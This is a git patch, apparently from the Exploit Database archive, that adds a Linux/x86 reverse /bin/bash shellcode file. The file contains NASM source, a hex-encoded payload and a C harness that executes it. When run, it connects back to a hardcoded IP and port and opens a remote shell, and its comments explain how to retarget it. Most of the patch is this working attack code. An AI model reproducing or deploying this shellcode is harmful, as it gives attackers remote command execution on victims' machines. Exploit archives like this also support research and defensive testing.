From d2c8c83204a670ccd96342b00a9c7146d0782c58 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 27 Mar 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-03-27 1 new exploits Linux/x86 - Reverse /bin/bash Shellcode (110 bytes) --- files.csv | 1 + platforms/lin_x86/shellcode/41723.c | 99 +++++++++++++++++++++++++++++ 2 files changed, 100 insertions(+) create mode 100755 platforms/lin_x86/shellcode/41723.c diff --git a/files.csv b/files.csv index 6c158a8fb..85b240f5b 100644 --- a/files.csv +++ b/files.csv @@ -16019,6 +16019,7 @@ id,file,description,date,author,platform,type,port 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0 +41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 diff --git a/platforms/lin_x86/shellcode/41723.c b/platforms/lin_x86/shellcode/41723.c new file mode 100755 index 000000000..e04a4a220 --- /dev/null +++ b/platforms/lin_x86/shellcode/41723.c @@ -0,0 +1,99 @@ +/* +; File name: reversebash.nasm +; Author: Jasmin Landry (@JR0ch17) +; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 +; To change +; Shellcode length: 110 bytes +; Tested on Ubuntu 12.04.5 32-bit (x86) +; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g +; Link: ld -z execstack -o reversebash reversebash.o +; Use objdump to find shellcode and copy it over to the code section of the .c file +; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2 + +global _start + +section .text +_start: + jmp short call_shellcode + +shellcode: + xor eax, eax + xor ebx, ebx + xor ecx, ecx + + pop edx + + push 0x6 + push 0x1 + push 0x2 + + mov al, 0x66 + mov bl, 0x1 + mov ecx, esp + int 0x80 + + mov esi, eax + + xor eax, eax + push eax + push dword [edx+2] + push word [edx] + push word 0x2 + mov ecx, esp + push 0x10 + push ecx + push esi + mov al, 0x66 + mov bl, 0x3 + mov ecx, esp + int 0x80 + + xor ecx, ecx + mov cl, 0x3 + +loop: + dec cl + mov al, 0x3f + mov ebx, esi + int 0x80 + + mov esi, eax + jnz loop + + xor eax, eax + xor ecx, ecx + push ecx + push 0x68736162 + push 0x2f6e6962 + push 0x2f2f2f2f + mov ebx, esp + push ecx + push ebx + mov al, 0xb + mov ecx, esp + xor edx, edx + int 0x80 + +call_shellcode: + call shellcode + port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile. + +*/ + + +#include +#include + +unsigned char code[] = \ +"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port. + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +}